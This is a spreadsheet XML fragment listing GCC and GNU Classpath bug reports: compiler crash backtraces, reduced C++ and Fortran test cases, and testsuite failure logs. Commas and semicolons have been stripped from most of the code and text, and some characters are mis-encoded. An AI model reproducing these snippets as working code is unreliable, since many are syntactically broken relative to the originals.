75	      p-&gt;size = size
(gdb) bt
#0  backtrace_free_locked (state=0x7ffff7ecc000 size=3912 addr=0x20b7) at ../../../gcc/libbacktrace/mmap.c:75
#1  backtrace_free (state=0x7ffff7ecc000 addr=0x20b7 size=3912 error_callback= data=)
    at ../../../gcc/libbacktrace/mmap.c:199
#2  0x00007ffff7fcd077 in backtrace_alloc (state=state@entry=0x7ffff7ecc000 size=size@entry=8376 
    error_callback=error_callback@entry=0x7ffff7ee8cd0  data=data@entry=0x7fffffffde90) at ../../../gcc/libbacktrace/mmap.c:148
#3  0x00007ffff7fcc7f8 in elf_initialize_syminfo (sdata=0x7ffff7ec0620 data=0x7fffffffde90 error_callback=0x7ffff7ee8cd0  
    strtab_size= strtab= symtab_size= symtab_data=0x7ffff7eb5088  base_address=140737352400896 
    state=0x7ffff7ecc000) at ../../../gcc/libbacktrace/elf.c:380
#4  elf_add (state= descriptor= base_address=140737352400896 error_callback= data=0x7fffffffde90 
    fileline_fn=fileline_fn@entry=0x7fffffffd998 found_sym=0x7fffffffda70 found_dwarf=0x7fffffffd994 exe=0) at ../../../gcc/libbacktrace/elf.c:748
#5  0x00007ffff7fccc67 in phdr_callback (info=0x7fffffffd9e0 size= pdata=0x7fffffffda80) at ../../../gcc/libbacktrace/elf.c:903
#6  0x0000003ba4b26726 in dl_iterate_phdr () from /lib64/libc.so.6
#7  0x00007ffff7fccd30 in backtrace_initialize (state=state@entry=0x7ffff7ecc000 descriptor= 
    error_callback=error_callback@entry=0x7ffff7ee8cd0  data=data@entry=0x7fffffffde90 fileline_fn=fileline_fn@entry=0x7fffffffdb08)
    at ../../../gcc/libbacktrace/elf.c:944
#8  0x00007ffff7fcb8b4 in fileline_initialize (state=state@entry=0x7ffff7ecc000 error_callback=error_callback@entry=0x7ffff7ee8cd0  
    data=data@entry=0x7fffffffde90) at ../../../gcc/libbacktrace/fileline.c:136
#9  0x00007ffff7fcb992 in backtrace_pcinfo (state=0x7ffff7ecc000 pc=140737352994313 callback=0x7ffff7ee8b10  
    error_callback=0x7ffff7ee8cd0  data=0x7fffffffde90) at ../../../gcc/libbacktrace/fileline.c:170
#10 0x00007ffff7fcbe61 in unwind (context= vdata=0x7fffffffde50) at ../../../gcc/libbacktrace/backtrace.c:83
#11 0x00007ffff7ea8439 in _Unwind_Backtrace (trace=trace@entry=0x7ffff7fcbe10  trace_argument=trace_argument@entry=0x7fffffffde50)
    at ../../../gcc/libgcc/unwind.inc:295
#12 0x00007ffff7fcbeb5 in backtrace_full (state=state@entry=0x7ffff7ecc000 skip=skip@entry=0 callback=callback@entry=0x7ffff7ee8b10  
    error_callback=error_callback@entry=0x7ffff7ee8cd0  data=data@entry=0x7fffffffde90) at ../../../gcc/libbacktrace/backtrace.c:106
#13 0x00007ffff7ee8e0a in _gfortrani_show_backtrace (in_signal_handler=in_signal_handler@entry=false) at ../../../gcc/libgfortran/runtime/backtrace.c:156
#14 0x00007ffff7ee9906 in _gfortrani_exit_error (status=status@entry=1) at ../../../gcc/libgfortran/runtime/error.c:196
#15 0x00007ffff7ee9b03 in _gfortrani_os_error (message=0x400a28 Allocation would exceed memory limit) at ../../../gcc/libgfortran/runtime/error.c:348
#16 0x000000000040081e in foomod::foo (a=... n=0) at test_1.f90:7
#17 0x00000000004008c0 in MAIN__ () at test_1.f90:16
Testcase:
&gt; cat test_1.f90
MODULE foomod
CONTAINS
  SUBROUTINE foo(aN)
   INTEGER DIMENSION(:) POINTER :: a
   INTEGER :: N
   ALLOCATE(a(N))
   a=0
  END SUBROUTINE
END MODULE foomod
USE foomod
INTEGER DIMENSION(:) POINTER :: a
INTEGER :: N
DO 
CALL foo(aN)
ENDDO
END
&gt; gfortran -g test_1.f90
&gt; ulimit -v 1000000
&gt; ./a.out
Operating system error: Cannot allocate memory
Allocation would exceed memory limit
Error termination. Backtrace:
Could not print backtrace: mmap: Cannot allocate memory
Could not print backtrace: mmap: Cannot allocate memory
Could not print backtrace: mmap: Cannot allocate memory
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
Backtrace for this error:
Segmentation fault</t>
  </si>
  <si>
    <t>GCC-40045</t>
  </si>
  <si>
    <t>ICE with type extension and -fdump-parse-tree</t>
  </si>
  <si>
    <t>Segfault with -fdump-parse-tree:
type t
end type
type extends(t) :: t2
end type t2
end</t>
  </si>
  <si>
    <t>GCC-78131</t>
  </si>
  <si>
    <t>Inconsistent evaluation for `constexpr` lambdas in templates between `static_assert` `if constexpr(â€¦)` and `constexpr` variables</t>
  </si>
  <si>
    <t>template 
constexpr auto f(TF)
{
    return [](auto...) constexpr { return true }
}   
// Compiles and works as intended.
template 
void ok_0(T0)
{
    static_assert(f([](auto x) -&gt; decltype(x){})(T0{}))
}
// Compiles and works as intended.
template 
void ok_1(T0)
{
    constexpr auto a = f([](auto x) -&gt; decltype(x){})(T0{})
    if constexpr(a) { }
}
// Compile-time error!
template 
void fail_0(T0)
{
    if constexpr(f([](auto x) -&gt; decltype(x){})(T0{})) { } 
}
---
Error:
prog.cc: In function 'void fail_0(T0)':
prog.cc:29:54: error: expression '' is not a constant expression
     if constexpr(f([](auto x) -&gt; decltype(x){})(T0{})) { }
Minimal example:
http://melpon.org/wandbox/permlink/NY4oKSlA76CkqPQ9
Related StackOverflow question:
http://stackoverflow.com/questions/40283001
P.S. the bug is still present even if 'constexpr' is explicitly specified for the lambdas passed to 'f'.</t>
  </si>
  <si>
    <t>vittorio.romeo</t>
  </si>
  <si>
    <t>GCC-251</t>
  </si>
  <si>
    <t>Internal compiler error on short matrix routine:uufiled and gzipped</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Thu 11 May 2000 12:09:59 +0100 (BST)
 Reply-To: vil@hep.phys.soton.ac.uk
 Hi gnu 
  here is the source code not preprocessed. Also included is the .ii file
 #include 
 #include 
 #include 
 #include 
 #include 
 #include 
 #include 
 #include 
 #include 
 #include cantmatch.h
 #include message_and_debug.h
 #include get_things_from_files.h
 #include nrutil.h
 // #include directory_information.h
 class vmatrix{
 private:
   float*body
 public:
   vmatrix(floatfloatfloatfloat)
   ~vmatrix()
   float gel(const int
 }
 class vmatrix::vmatrix(float afloat bfloat cfloat d)
 {
   body=new float[4]
   body[0]=abody[1]=bbody[2]=cbody[3]=d
   printf(%d %d %d %d\nabcd)
 }
 class vmatrix::~vmatrix(){delete[]body}
 float class vmatrix::gel(const int&amp;a){
   printf(%d bodya\nbody[a])return body[a]}
 void main(void)
 {
   float ab
   float f
   f=0.5
   vmatrix ident(float(1)float(0)float(0)float(1))
   a=ident-&gt;gel(0)
   cout&lt;&lt;f&lt;&lt;endl
   a=ident-&gt;gel(0)
   a=ident-&gt;gel(0)
 }
Release:
2.95.2
How-To-Repeat:
See attachments for test.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-26989</t>
  </si>
  <si>
    <t>C++ front-end (and others parts of GCC) use the wrong check to see if hidden visibility is there</t>
  </si>
  <si>
    <t>As reported over here:
http://gcc.gnu.org/ml/gcc-patches/2006-03/msg01428.html
HAVE_GAS_HIDDEN is the wrong check and should not be used.
Since this was reported more than a week ago and nothing has been done I am filing a bug report.
I am going add this is a regression as anonymous namespace was correctly marked as hidden for a while on powerpc-darwin but is no longer.</t>
  </si>
  <si>
    <t>GCC-57092</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] Using decltype of function pointer type to define a data member causes compiler crash</t>
  </si>
  <si>
    <t>This code:
    template 
    class B {
        decltype(F) v
    }
    void foo(int) {}
    int main() {
        B o
    }
causes this crash:
    $ g++ -std=c++11 bug.cpp
    bug.cpp: In instantiation of 'class B':
    bug.cpp:9:12:   required from here
    bug.cpp:3:17: internal compiler error: in finish_decltype_type at cp/semantics.c:5365
         decltype(F) v
                     ^
    0x5a6230 finish_decltype_type(tree_node* bool int)
            ../../src/gcc/cp/semantics.c:5365
    0x521c5c tsubst(tree_node* tree_node* int tree_node*)
            ../../src/gcc/cp/pt.c:11772
    0x51fe2e tsubst_decl
            ../../src/gcc/cp/pt.c:10450
    0x5218a7 tsubst(tree_node* tree_node* int tree_node*)
            ../../src/gcc/cp/pt.c:11081
    0x52f177 instantiate_class_template_1
            ../../src/gcc/cp/pt.c:8818
    0x52f177 instantiate_class_template(tree_node*)
            ../../src/gcc/cp/pt.c:9054
    0x57ce2d complete_type(tree_node*)
            ../../src/gcc/cp/typeck.c:131
    0x4ff471 start_decl_1(tree_node* bool)
            ../../src/gcc/cp/decl.c:4662
    0x50d294 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
            ../../src/gcc/cp/decl.c:4625
    0x572b98 cp_parser_init_declarator
            ../../src/gcc/cp/parser.c:15914
    0x5734ce cp_parser_simple_declaration
            ../../src/gcc/cp/parser.c:10567
    0x56edd0 cp_parser_block_declaration
            ../../src/gcc/cp/parser.c:10448
    0x56fdf0 cp_parser_declaration_statement
            ../../src/gcc/cp/parser.c:10092
    0x570497 cp_parser_statement
            ../../src/gcc/cp/parser.c:8867
    0x57167e cp_parser_statement_seq_opt
            ../../src/gcc/cp/parser.c:9139
    0x57179e cp_parser_compound_statement
            ../../src/gcc/cp/parser.c:9093
    0x5718e8 cp_parser_function_body
            ../../src/gcc/cp/parser.c:17680
    0x5718e8 cp_parser_ctor_initializer_opt_and_function_body
            ../../src/gcc/cp/parser.c:17716
    0x57252f cp_parser_function_definition_after_declarator
            ../../src/gcc/cp/parser.c:21691
    0x573143 cp_parser_function_definition_from_specifiers_and_declarator
            ../../src/gcc/cp/parser.c:21612
    Please submit a full bug report
    with preprocessed source if appropriate.
    Please include the complete backtrace with any bug report.
    See  for instructions.</t>
  </si>
  <si>
    <t>kjw.chiu</t>
  </si>
  <si>
    <t>GCC-10735</t>
  </si>
  <si>
    <t>ICE on correct type conversion with vector</t>
  </si>
  <si>
    <t xml:space="preserve">From: Dara Hazeghi 
To: gcc-gnats@gcc.gnu.org shurick@pisem.net
Cc:  
Subject: Re: c/10735: Crash on incorrect type conversion
Date: Sat 10 May 2003 16:24:20 -0700
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit- 
 trail&amp;database=gcc&amp;pr=10735
 Hello
 you don't mention a platform in your bug report nor do you give the  
 exact error message. Both are essential to tracking down your bug.  
 Could you please add them (just replying to this message will do so).  
 Also if possible can you try your testcase on gcc 3.2.3? Thanks
 Dara
</t>
  </si>
  <si>
    <t>shurick</t>
  </si>
  <si>
    <t>GCC-30634</t>
  </si>
  <si>
    <t>FAIL: gfortran.fortran-torture/execute/intrinsic_set_exponent.f90</t>
  </si>
  <si>
    <t>Executing on host: /home/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B
/home/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ /xxx/gnu/gcc/gcc/gcc/testsuit
e/gfortran.fortran-torture/execute/intrinsic_set_exponent.f90  -w  -O1   -L/home
/gnu/gcc/objdir/hppa64-hp-hpux11.00/./libgfortran/.libs -L/home/gnu/gcc/objdir/h
ppa64-hp-hpux11.00/./libgfortran/.libs -L/home/gnu/gcc/objdir/hppa64-hp-hpux11.0
0/./libiberty  -lm   -o /xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/intrinsic_set
_exponent.x    (timeout = 300)
/xxx/gnu/gcc/gcc/gcc/testsuite/gfortran.fortran-torture/execute/intrinsic_set_ex
ponent.f90: In function 'test_real8':
/xxx/gnu/gcc/gcc/gcc/testsuite/gfortran.fortran-torture/execute/intrinsic_set_ex
ponent.f90:86: error: unrecognizable insn:
(insn 239 84 87 11 (set (reg:DF 32 %fr4 [ equiv.1 ])
        (mem/u/c/i:DF (symbol_ref/u:DI (*L$C0007) [flags 0x2]) [0 S8 A64])) -1
 (nil)
    (nil))
/xxx/gnu/gcc/gcc/gcc/testsuite/gfortran.fortran-torture/execute/intrinsic_set_ex
ponent.f90:86: internal compiler error: in extract_insn at recog.c:2077
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/xxx/gnu/gcc/gcc/gcc/testsuite/gfortran.fortran-torture/execute/intrinsic_set_ex
ponent.f90: In function 'test_real8':
/xxx/gnu/gcc/gcc/gcc/testsuite/gfortran.fortran-torture/execute/intrinsic_set_ex
ponent.f90:86: error: unrecognizable insn:
(insn 239 84 87 11 (set (reg:DF 32 %fr4 [ equiv.1 ])
        (mem/u/c/i:DF (symbol_ref/u:DI (*L$C0007) [flags 0x2]) [0 S8 A64])) -1
 (nil)
    (nil))
/xxx/gnu/gcc/gcc/gcc/testsuite/gfortran.fortran-torture/execute/intrinsic_set_ex
ponent.f90:86: internal compiler error: in extract_insn at recog.c:2077
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gfortran.fortran-torture/execute/intrinsic_set_exponent.f90  -O1  (intern
al compiler error)</t>
  </si>
  <si>
    <t>GCC-71049</t>
  </si>
  <si>
    <t>[6/7 Regression] libstdc++ fails to build --with-default-libstdcxx-abi=gcc4-compatible --disable-libstdcxx-dual-abi</t>
  </si>
  <si>
    <t>libstdc++ fails to build when configured --with-default-libstdcxx-abi=gcc4-compatible --disable-libstdcxx-dual-abi
../../../../../src/libstdc++-v3/src/c++11/cow-stdexcept.cc: In function 'const char* _txnal_sso_string_c_str(const void*)':
../../../../../src/libstdc++-v3/src/c++11/cow-stdexcept.cc:300:40: error: 'const __sso_string {aka const class std::basic_string}' has no member named '_M_s' did you mean '_M_rep'?
                                        ^~~~</t>
  </si>
  <si>
    <t>GCC-47674</t>
  </si>
  <si>
    <t>gfortran.dg/realloc_on_assign_5.f03: Segfault at run time for deferred (allocatable) string length</t>
  </si>
  <si>
    <t>gfortran.dg/realloc_on_assign_5.f03 segfaults here it works if I unset the environment variable MALLOC_CHECK_.
Valgrind shows:
Invalid read of size 1
   at 0x4C285C8: memmove (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
   by 0x400B41: MAIN__ (realloc_on_assign_5.f03:15)
   by 0x400BF7: main (realloc_on_assign_5.f03:18)
Address 0x5b524c1 is 0 bytes after a block of size 1 alloc'd
   at 0x4C26682: realloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
   by 0x400B0C: MAIN__ (realloc_on_assign_5.f03:15)
   by 0x400BF7: main (realloc_on_assign_5.f03:18)
Excerpt from the test:
  a = 'ab'   ! OK
  a = (a(2:2)) ! seems to fail
thus
  print '(&gt;a&lt;)' a
prints &gt; STX (start of text character) b&lt; and a new line is printed.
DUMP: The first if does not make sense - at least in this special case - and there is the issue that a is also used on the RHS without using a temporary.
        D.1531 = .a
        if (D.1531 != 0)
          {
            if (() D.1531 &lt;= 1)
              {
                __builtin_memmove (a 
              }
            else
              {
                __builtin_memcpy (a 
                __builtin_memset (a + 1 32 D.1531 + 0x0ffffffffffffffff)
              }
          }</t>
  </si>
  <si>
    <t>GCC-21471</t>
  </si>
  <si>
    <t>'POSITION = APPEND' doesn't seem to work</t>
  </si>
  <si>
    <t>Hi!
I am under the impression that the gfortran compiler doesn't (at least in some
cases) handle well the APPEND file access and rather overwrites the contents
of the file...
Can you help me with that?
Thanks!
Philippe
PS: gfortran -vUsing built-in specs.
Target: i686-pc-linux-gnu
Configured with:
/USER/philippe/Irix/Compilation/gcc/Sources/Release_4_0_0/gcc/configure
--prefix=/usr1/MICRESS/Philippe/Tools/Gcc
--with-mpfr=/usr1/MICRESS/Philippe/Tools/Mpfr
--with-gmp=/usr1/MICRESS/Philippe/Tools/Gmp
Thread model: posix
gcc version 4.1.0 20050503 (experimental)
PPS: the command I use to run this test:
gfortran --static -o Hello_World Hello_World.f90  rm -f File  touch File 
./Hello_World  cat File
PPPS: a small example I put together: File should contains 13 times
Hello_World but in fact only has the last one
!======================================================================!
! **********************************************************************
! *								       *
! *			       T e s t  			       *
! *								       *
! **********************************************************************
!======================================================================!
!
!======================================================================!
! Declaration
!======================================================================!
!
      PROGRAM Test
!
      INTEGER    ::   Counter
!
      CHARACTER ( LEN = 250 ) PARAMETER    ::   String = Hello world!
!
!======================================================================!
! Begin
!======================================================================!
!
!
      WRITE ( 6 (/A) ) Beginning of screen output
      DO Counter = 1 13
         OPEN ( UNIT = 13 FILE = File FORM = FORMATTED          &amp;
     &amp;                             POSITION = APPEND STATUS = OLD )
         WRITE ( UNIT = 13 FMT = (AI5) ) TRIM(String) Counter
         CLOSE ( UNIT = 13 )
         WRITE ( 6 (AI3) ) TRIM(String) Counter
      END DO
      WRITE ( 6 (A/) ) End of screen output
!
!
!======================================================================!
!     End
!======================================================================!
      END PROGRAM Test</t>
  </si>
  <si>
    <t>GCC-36855</t>
  </si>
  <si>
    <t>__has_trivial_destructor() returns false for reference types.</t>
  </si>
  <si>
    <t xml:space="preserve">
    __has_trivial_destructor() returns false for all reference types but
    should return true according to documentation. The documented behavior
    is consistent with what is required by the c++0x draft.
Environment:
System: Linux cranium 2.6.18-8.el5xen #1 SMP Fri Jan 26 14:29:35 EST 2007 x86_64 x86_64 x86_64 GNU/Linux
Architecture: x86_64
host: x86_64-unknown-linux-gnu
build: x86_64-unknown-linux-gnu
target: x86_64-unknown-linux-gnu
configured with: /build/sebor/src/gcc-4.3.0/configure --prefix=/nfs/devco/contrib/linux/gcc-4.3.0 --with-gmp=/nfs/devco/contrib/linux/gmp-4.2 --with-mpfr=/nfs/devco/contrib/linux/mpfr-2.3.1
How-To-Repeat:
    Attempt to compile the following code as g++ -std=gnu++0x t.cpp
    typedef char assert_0 [__has_trivial_destructor (int</t>
  </si>
  <si>
    <t>GCC-33330</t>
  </si>
  <si>
    <t>[4.3 Regression] Wrong alias for accessing scalar through array</t>
  </si>
  <si>
    <t>copy of http://gcc.gnu.org/ml/fortran/2007-09/msg00121.html:
I have done some investigation about the recent failure of gfortran.dg/c_char_tests.f03. First the failure disappears with -fno-inline or -fno-inline-functions:
[karma] f90/bug% gfc c_char_tests_db.f03 -O3 -fno-inline c_char_driver_db.c
[karma] f90/bug% a.out
[karma] f90/bug% gfc c_char_tests_db.f03 -O3 -fno-inline-functions c_char_driver_db.c
[karma] f90/bug% a.out
Second if I remove the line   sub0() in c_char_driver.c the test succeeds so the C driver can be reduced to:
[karma] f90/bug% cat c_char_driver_red.c
void sub0(void)
int main(int argc char **argv)
{
  char my_char = 'y'
  sub0()
  return 0
}
with the same behavior. Now the stange part: if I try the following reduced code:
! { dg-do run }
! { dg-additional-sources c_char_driver.c }
! Verify that character dummy arguments for bind(c) procedures can work both 
! by-value and by-reference when called by either C or Fortran.
! PR fortran/32732
module c_char_tests
  use intrinsic :: iso_c_binding only: c_char
  implicit none
contains
  subroutine param_test(my_char) bind(c)
    character(c_char) value :: my_char
    call sub1(my_char)
  end subroutine param_test
  subroutine sub0() bind(c)
    call param_test('y')
  end subroutine sub0
  subroutine sub1(my_char_ref) bind(c)
    character(c_char) :: my_char_ref
    if(my_char_ref /= c_char_'y') call abort()
  end subroutine sub1
end module c_char_tests
! { dg-final { cleanup-modules c_char_tests } }
I get:
[karma] f90/bug% gfc c_char_tests_red.f03 -O3 -fno-inline-functions c_char_driver_red.c
[karma] f90/bug% a.out
Abort
[karma] f90/bug% gfc c_char_tests_red.f03 -O3 -fno-inline-functions -fno-inline c_char_driver_red.c
[karma] f90/bug% a.out
Wierd isn't it?
So if one wants an immediate clean test suite add -fno-inline-functions. Now clearly the new version of GCC inlines more than the previous one with two failing cases. The first one (do_3) is a very borderline one testing folding after integer overflows and I think the addition of -fno-strict-overflow is enough. In my opinion the second case requires further investigation but I don't think it would be a good idea to try to prevent the new inlining (unless we discover that it open another Pandora box).</t>
  </si>
  <si>
    <t>GCC-22007</t>
  </si>
  <si>
    <t>Stack overflow in g++.dg/eh/cleanup1.C</t>
  </si>
  <si>
    <t xml:space="preserve">
Between 20050113 and 20050609 there occured a new testsuite failure on the
4.0 branch on Tru64 UNIX V4.0F:
+FAIL: g++.dg/eh/cleanup1.C (test for excess errors)
FAIL: g++.dg/eh/cleanup1.C (test for excess errors)
Excess errors:
Stack overflow: pid 11784 proc cc1plus addr 0x11fdfffe0 pc 0x12011b7ec
g++: Internal error: Segmentation fault (program cc1plus)
The default stack size on V4.0F is 2048 kB compared to 8192 kB on V5.1B
raising stack size to the latter value works.  Anyway obviously stack
usage has increased considerably in this case.
Environment:
System: OSF1 rimsky V4.0 1229 alpha
Machine: alpha
host: alpha-dec-osf4.0f
build: alpha-dec-osf4.0f
target: alpha-dec-osf4.0f
configured with: /vol/gnu/src/gcc/gcc-4.0-branch-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --host alpha-dec-osf4.0f --build alpha-dec-osf4.0f --target alpha-dec-osf4.0f --with-gmp-dir=/vol/gnu/obj/gmp-4.1.3 --with-mpfr-dir=/vol/gnu/obj/gmp-4.1.3/mpfr --enable-languages=cc++f95javaobjcada
How-To-Repeat:
Bootstrap and test as described above.</t>
  </si>
  <si>
    <t>GCC-26365</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in finish_class_member_access_expr at cp/typeck.c</t>
  </si>
  <si>
    <t>incorrect code gives ICE</t>
  </si>
  <si>
    <t>cees</t>
  </si>
  <si>
    <t>GCC-43206</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 145440 caused ICE at cp/pt.c:9249</t>
  </si>
  <si>
    <t>Revision 145440:
http://gcc.gnu.org/ml/gcc-cvs/2009-04/msg00060.html
caused:
[hjl@gnu-34 rrs]$ cat pr43087.cc
template class NumericTraits{}
template class CovariantVector{}
template class Image{}
template&lt;class H
         class E
         class D&gt;
class F {
  typedef H G
  typedef
  typename NumericTraits::RealType
  InputRealType
}
template&lt;typename TInputImage
  typename TOutputImage=Image&lt;
  CovariantVector&lt;
  typename NumericTraits&lt;
  typename TInputImage
::PixelType
&gt;
::TInputImage
&gt;
&gt;
&gt;
class XXX{}
XXX &gt;
[hjl@gnu-34 rrs]$ ./145440/usr/bin/gcc -S pr43087.cc
pr43087.cc:25: internal compiler error: tree check: accessed elt 3 of tree_vec with 2 elts in tsubst at cp/pt.c:9249
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-30180</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/builtin-bswap-1.c (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/builtin-bswap-1.c    -fno-show-column -S  -o
 builtin-bswap-1.s    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/builtin-bswap-1.c:5: error: stdint.h: No
such file or directory
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/builtin-bswap-1.c:7: error: expected '='
 '' '' 'asm' or '__attribute__' before 'foo'
compiler exited with status 1
output is:
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/builtin-bswap-1.c:5: error: stdint.h: No
such file or directory
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/builtin-bswap-1.c:7: error: expected '='
 '' '' 'asm' or '__attribute__' before 'foo'
FAIL: gcc.dg/builtin-bswap-1.c (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/builtin-bswap-1.c:5: error: stdint.h: No
such file or directory
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/builtin-bswap-1.c:7: error: expected '='
 '' '' 'asm' or '__attribute__' before 'foo'
ERROR: gcc.dg/builtin-bswap-1.c: error executing dg-final: couldn't open builti
n-bswap-1.s: no such file or directory
UNRESOLVED: gcc.dg/builtin-bswap-1.c: error executing dg-final: couldn't open b
uiltin-bswap-1.s: no such file or directory</t>
  </si>
  <si>
    <t>GCC-47789</t>
  </si>
  <si>
    <t>[F03] Structure constructor of type extending DT with no components</t>
  </si>
  <si>
    <t>The following program gives error in compilation
module modone
type:: one
!    integer :: b
contains
    procedure  :: f
end type
type extends(one) :: two
    real :: a
endtype
contains
subroutine f(this)
    class(one) :: this
    print *'F'
end subroutine
end module
program mmain
use modone
!type(two) :: wo = two(26.7)
type(two) :: wo = two(6.7)
call wo%f()
end program
-----------------------
type(two) :: wo = two(6.7)
                       1
Error: Invalid character in name at (1)
While after uncommenting
    integer :: b
and exchanging the comments in the two declaration
    type(two) :: wo = two(26.7)
    !type(two) :: wo = two(6.7)
make the program compile and run</t>
  </si>
  <si>
    <t>eddyg_61-bugzilla</t>
  </si>
  <si>
    <t>GCC-26997</t>
  </si>
  <si>
    <t>g++ reports misleading  error message when the identifier with error occurs earlier on the same line</t>
  </si>
  <si>
    <t>The program below reports the following compiler errors:
bug.cpp:17: error: expected primary-expression before '*' token
bug.cpp:17: error: expected primary-expression before ')' token
bug.cpp:17: error: expected `' before 'malloc'
which seem to refer to the first occurence of identifier t
on the line 17. However that is a correct occurence.
The mistake is later on the line but the error message
of the compiler is misleading. This is not a serious issue...
$ uname -a
Linux ... 2.6.12-1-386 #1 Tue Sep 27 12:41:08 JST 2005 i686 GNU/Linux
$ g++ --version
g++ (GCC) 4.0.3 (Debian 4.0.3-1)
libc6: 2.3.6-3
libstdc++6 4.0.3-1
-------------------------------------------
#include 
typedef struct { int a int b } t
int main()
{
  t v1 *v2
  t *v3
  v2 = 
  v1.a = 2
// correct code:
//v3 = (t *)malloc(sizeof(t) * v2-&gt;a)
// code with a mistake:
  v3 = (t *)malloc(sizeof(t) * t-&gt;a)
  return 0
}
-------------------------------------</t>
  </si>
  <si>
    <t>pavel.petrovic</t>
  </si>
  <si>
    <t>GCC-26494</t>
  </si>
  <si>
    <t>-pedantic-errors can be overridden by -W*</t>
  </si>
  <si>
    <t>This simple incorrect program:
int main() { puts(Hello) }
when compiled with gcc -std=c99 -pedantic-errors is rejected with
test.c: In function â€˜mainâ€™:
test.c:1: error: implicit declaration of function â€˜putsâ€™
However add -Wall to the options and it becomes:
test.c: In function â€˜mainâ€™:
test.c:1: warning: implicit declaration of function â€˜putsâ€™
and the program compiles and runs without errors. I think gcc should not compile it. Also reordering the options doesn't change anything.
Given how old this is (I can see it with gcc 3.3.6 3.4.5 4.0.2 and 4.1(20060223)) I'm a bit surprised if it hasn't come up before but I searched bugzilla and didn't find anything. Sorry for anything I missed.</t>
  </si>
  <si>
    <t>CLASSPATH-22777</t>
  </si>
  <si>
    <t>Implementation of java.util.Locale.getAvailableLocales() uses small static set of locales</t>
  </si>
  <si>
    <t>The current implementation of getAvailableLocales() in java.util.Locale returns only an array of four locales (Locale.ENGLISH Locale.FRENCH Locale.GERMAN new Locale(ga )).  This should return the full set of locales which are implemented in gnu.java.locale or at the very least the set of static locales defined within the Locale class.  At present currencies can not be creating using most (if not all) ISO codes to name but one problem.</t>
  </si>
  <si>
    <t>GCC-49268</t>
  </si>
  <si>
    <t>Invalid code generated for assumed-size Cray pointee</t>
  </si>
  <si>
    <t>The attached code compiles but segfaults at runtime as of revision 157512. I have a tentative fix that I'll post shortly.</t>
  </si>
  <si>
    <t>GCC-17902</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE from tree_verify_flow_info</t>
  </si>
  <si>
    <t xml:space="preserve">
g++ crashes compiling the code below when i use 
 -O3 -mtune=pentiumpro:
$ /usr/local/gcc/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1plus -quiet  x.cc -quiet  -mtune=pentiumpro  -O3
x.cc: In function `void fill_ntuples()':
x.cc:16: internal compiler error: tree check: expected class 'declaration' have 'statement' (label_expr) in tree_verify_flow_info at /tree-cfg.c:3504
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$
At this point all my attempts to simplify the example further make the
crash go away.
Environment:
System: Linux karma 2.6.8.1 #20 Mon Sep 13 23:48:47 EDT 2004 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/sss/gcc/gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long --enable-languages=cc++f95
How-To-Repeat:
Compile the code below with  -O3 -mtune=pentiumpro.
------------------------------------------------
extern int foo()
bool a
bool b
bool f() { return a || b }
struct A { ~A(){} }
struct vector
{
  ~vector() { if (f()) foo()}
  A _M_impl
}
void fill_ntuples()
{      
  vector smt_states
  int nbar4=0
  bool log3 = false
  for (int j=0j&lt;foo()j++){
    int jdeter = foo()
    if (0!=j
    if (jdeter==1&amp;&amp;0!=j)
    {
      if (foo()==4){
        nbar4++
      }
    }
    if (foo()==3) log3=true
  }
  int jjhi=foo()
  for (int jj=0jj&lt;jjhijj++)
  {
    if (
        (jj==0)||
        (jj==1&amp;&amp;log3&amp;&amp;nbar4&gt;=3)
        )
    {
      vector substates
    }
  }
}
------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-82276</t>
  </si>
  <si>
    <t>[8 Regression] -O2: ICE: SSA corruption during RTL pass: expand at tree-ssa-coalesce.c:1010</t>
  </si>
  <si>
    <t>With gcc 8.0 (SVN revision 252973 from 2017-09-19) we hit internal compiler error:
Unable to coalesce ssa_names 8 and 28 which are marked as MUST COALESCE.
f_8(ab) and  f_28(ab)
during RTL pass: expand
reduced-2.c:12:6: internal compiler error: SSA corruption
 void c(void) {
      ^
0xe23c9c fail_abnormal_edge_coalesce
	../../gcc-trunk/gcc/tree-ssa-coalesce.c:1010
0xe23c9c coalesce_partitions
	../../gcc-trunk/gcc/tree-ssa-coalesce.c:1399
0xe23c9c coalesce_ssa_name()
	../../gcc-trunk/gcc/tree-ssa-coalesce.c:1886
0xdc997b remove_ssa_form
	../../gcc-trunk/gcc/tree-outof-ssa.c:948
0xdc997b rewrite_out_of_ssa(ssaexpand*)
